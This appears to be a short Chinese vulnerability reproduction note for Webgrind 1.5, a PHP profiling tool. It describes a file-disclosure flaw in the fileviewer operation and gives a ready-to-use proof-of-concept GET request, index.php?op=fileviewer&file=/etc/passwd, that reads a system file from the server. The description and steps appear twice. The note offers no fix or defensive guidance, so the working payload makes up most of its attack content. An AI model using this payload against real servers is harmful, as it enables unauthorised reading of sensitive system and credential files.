漏洞描述:
Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件
复现过程:
1.访问ip:port
2.构造poc,发送get请求
/index.php?op=fileviewer&file=/etc/passwd
Webgrind是一套PHP执行时间分析工具。其中Webgrind 1.5版本中存在安全漏洞,该漏洞源于程序依靠用户输入来显示文件。攻击者可以通过漏洞读取服务器敏感文件
1.访问ip:port
2.构造poc,发送get请求
/index.php?op=fileviewer&file=/etc/passwd